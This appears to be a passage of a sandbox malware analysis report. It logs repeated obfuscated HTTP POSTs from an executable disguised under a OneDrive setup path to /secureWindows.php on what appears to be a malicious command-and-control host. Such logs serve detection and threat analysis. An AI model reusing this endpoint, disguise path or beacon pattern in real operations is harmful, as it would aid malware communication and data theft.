                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jvqV0GHfSUM2Qc%2FLtF8seUETB9MmgncHr177Oe8Is4qn4lIK3BlujFQzO3bXQHMBmpjx86a1R6MvXtKyyXCB%2BRifewg34uBQ74lnOPzUIyRKS8NKx22E05aumfRA0YiyiaY0MWu0lCE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1f16d0b7d5d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1825&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=801328&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:23:54.310867071 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jvqV0GHfSUM2Qc%2FLtF8seUETB9MmgncHr177Oe8Is4qn4lIK3BlujFQzO3bXQHMBmpjx86a1R6MvXtKyyXCB%2BRifewg34uBQ74lnOPzUIyRKS8NKx22E05aumfRA0YiyiaY0MWu0lCE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1f16d0b7d5d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1825&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=801328&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        127192.168.2.450130188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:54.220940113 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:54.574472904 CET1076OUTData Raw: 57 50 59 50 50 5a 53 55 58 57 50 59 55 5a 5b 5c 54 52 5c 5d 59 56 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYPPZSUXWPYUZ[\TR\]YVZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/#.]+:X'.+9(\&><^/*[":/':7X+6%^0:. F$,Z*-
                                                        Oct 30, 2024 05:23:54.823973894 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:55.029006958 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kYWqOu75Kj4InUQ3gg1y2RU1owtLNGx9FXZ3DMvXECR08ZL1MlN%2BrCsAZsKhUsG9Gv7ofg00LtX8AqqOgqR3chmJ7fOhlQjzGZRkf039ytpmkLTefwNsuMmwkzzG%2BMPDauX%2FpOW74n8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1f74ca82c92-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2271&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=648164&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        128192.168.2.450131188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:55.158457041 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:55.511775017 CET1076OUTData Raw: 57 5e 59 51 55 54 56 54 58 57 50 59 55 51 5b 5a 54 59 5c 5c 59 5d 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YQUTVTXWPYUQ[ZTY\\Y]Z[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%82(.$=$-%,\2=(_;#"94')+6"$>9 F$,Z*
                                                        Oct 30, 2024 05:23:55.766048908 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:56.075627089 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCtkMEyfvME3zvsX0Pq9zxUV5eYnDnwlWTKHTAsGwa6Iw7%2BMqxBDPQCExcuOTApAAffd%2B7PkXc4npVaG2cY%2FKxq6FXTesWX2ym6JznwhFa7a5SZVOrxlC3iXBwsMIbnlGErWKH8FI6g%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1fd2afd2c9e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2186&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=685606&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        129192.168.2.450132188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:56.209759951 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:56.559592009 CET1076OUTData Raw: 57 55 59 52 55 5f 56 5c 58 57 50 59 55 5c 5b 5a 54 5e 5c 58 59 53 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WUYRU_V\XWPYU\[ZT^\XYSZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/!<("'8:(^%8X8:X79$1<(5$8!Y-: F$,Z*5
                                                        Oct 30, 2024 05:23:56.822371006 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:57.039412022 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NqbhUbjvl7zyayfgDk7y2e5LPjKdPPxSKaFORHzQ3nE8NO04YU%2BL0iwex8NcOJYSyyN57T4K9bSzuZ%2BdS%2FW2hu8WTi2E%2Fhw6dr%2Fm0o%2B4UOJZ0Kr0EPeF5OYeE%2B9I04uZ1dNBj5sBGeU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a203cdfb358e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1190&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1215785&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        130192.168.2.450133188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:57.350754023 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:57.699212074 CET1076OUTData Raw: 52 57 59 52 55 5f 53 57 58 57 50 59 55 5f 5b 5f 54 53 5c 58 59 55 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RWYRU_SWXWPYU_[_TS\XYUZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;>?8&$[?B. \%.,X,:#9+'90)&9]$. F$,Z*


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        131192.168.2.450134188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:57.942904949 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:58.295387983 CET1340OUTData Raw: 57 5e 5c 5d 55 5a 56 54 58 57 50 59 55 5a 5b 5d 54 53 5c 58 59 50 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\]UZVTXWPYUZ[]TS\XYPZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]/)+>0:C/%;8*$4&<+1\0!X9 F$,Z*-
                                                        Oct 30, 2024 05:23:58.542418003 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:58.748903990 CET929INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QLcpV622LVkbXz6zueeHA2swpmGe4GxdIzZZzrlfx4O7chArBKu7MKVaFN2kZoifXnh0Ns8qwoTUiM2vICzZ387Rqwg0ZRgufJF32zaslQHWnaGj5bq9QZnjIXWCXuOE2o0cr7YdMxs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a20e8ca52857-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1294&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1151949&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 13 3f 5e 37 0c 24 33 32 58 3c 05 2d 58 2a 3e 2a 14 24 57 24 5c 32 05 3e 5b 3c 3b 2f 10 3d 42 2c 5b 3f 0c 2b 05 34 25 30 5e 29 01 2f 46 0c 10 24 06 24 0c 05 52 3c 0d 26 05 29 01 33 5d 20 56 32 58 3d 29 28 0c 35 0a 24 5a 24 22 35 0a 2f 03 03 0e 2e 43 21 03 39 0d 20 56 2a 00 21 57 08 14 22 1f 31 2f 20 05 27 3e 20 58 25 32 3e 1c 34 59 23 5b 23 28 3e 59 3c 05 28 1c 25 1e 16 10 27 55 3c 0a 25 39 28 5a 28 0f 09 1c 26 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&?^7$32X<-X*>*$W$\2>[<;/=B,[?+4%0^)/F$$R<&)3] V2X=)(5$Z$"5/.C!9 V*!W"1/ '> X%2>4Y#[#(>Y<(%'U<%9(Z(&3"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        132192.168.2.450135188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:58.061199903 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:58.418790102 CET1076OUTData Raw: 57 52 5c 54 55 5b 56 51 58 57 50 59 55 5f 5b 52 54 58 5c 5d 59 5d 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WR\TU[VQXWPYU_[RTX\]Y]ZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%- >?8.]'7-5<]%<X/:$Z#2*(+%=^')X/* F$,Z*
                                                        Oct 30, 2024 05:23:58.655775070 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:58.974843025 CET792INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6r9HpWQtX5A6v5HTRV4Jj%2FpTfwmlcX9dB%2FhBJQ%2BbOEMT1Hm%2BxIZT78M1eRHZnGqwgGOeu%2BRVOpzCo5cvaPyDXHekSZJqkddR3EDJAQ3hR6NtrMUfmK7SDauiQ7sqg4HzsUzR%2F9z5h0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a20f38686b42-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1175&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1163052&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        133192.168.2.450136188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:59.112531900 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:59.464817047 CET1072OUTData Raw: 57 57 5c 54 55 54 53 52 58 57 50 59 55 58 5b 5d 54 5b 5c 59 59 52 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\TUTSRXWPYUX[]T[\YYRZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^;]?+.'-(9%<1.8[/\8##X1#)5:3+)Z: F$,Z*
                                                        Oct 30, 2024 05:23:59.706995964 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:59.918560028 CET789INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HOg2VWfrf1wN9jZKiMSW29bYuPFv6nzBOCgfEXrLBoQHt9Bcz4plpiuWTxcb3tTgbQDRVzrVbTv%2B%2FrnngZ9NGXYT8rkQLtMkOAn4xDik8EAk3flnPMjpEtT9qYI%2BNIACRn%2FVF5G7Z%2BU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a215dd40486b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1691&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1358&delivery_rate=888888&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        134192.168.2.450137188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:00.047025919 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:00.402687073 CET1076OUTData Raw: 57 53 5c 51 55 5e 53 52 58 57 50 59 55 5c 5b 5d 54 52 5c 5c 59 50 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\QU^SRXWPYU\[]TR\\YPZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\, (8&X%=@9,&.?/9<#%_7<%\3(&: F$,Z*5
                                                        Oct 30, 2024 05:24:00.678414106 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:00.965150118 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRGYA0wKdJOkl1nE0mjONhzyxGJwzqoCWqMoD1W2HUcLa6sCrMUSw9h3cZ2JQNKuHikaItH%2FTqd68wI7JGH7BMuA%2FZIGQmqkfDqWX8yzbOulKDtS5vMP31soqj6ora%2FRc8BNpySZj2k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a21be82e2c9d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1601&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=929993&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        135192.168.2.450138188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:01.727804899 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:02.074203968 CET1076OUTData Raw: 57 5e 5c 5c 55 5f 56 57 58 57 50 59 55 5c 5b 5b 54 5b 5c 54 59 54 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\\U_VWXWPYU\[[T[\TYTZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[- -<82$[;. _%>0X;:;":&#(%'!- F$,Z*5
                                                        Oct 30, 2024 05:24:02.324040890 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:02.534905910 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rKhMm56UjaE0o1bT28joCY6N9qp4HpJPDt4%2FtXslDTTS57y3SxqmEf4nVJo%2FINZZsJWrmFe9oiP4Mv9UGTgWotBjZiHWPDWGEimOdrjOGq0euP%2FQESWPAsZ1coxJH5nKU8r6pOIT3fo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2262b9e6b79-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1019&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1476044&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        136192.168.2.450139188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:24:02.661389112 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:03.012001991 CET1076OUTData Raw: 52 54 59 52 55 5a 56 56 58 57 50 59 55 5e 5b 5d 54 58 5c 58 59 5d 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
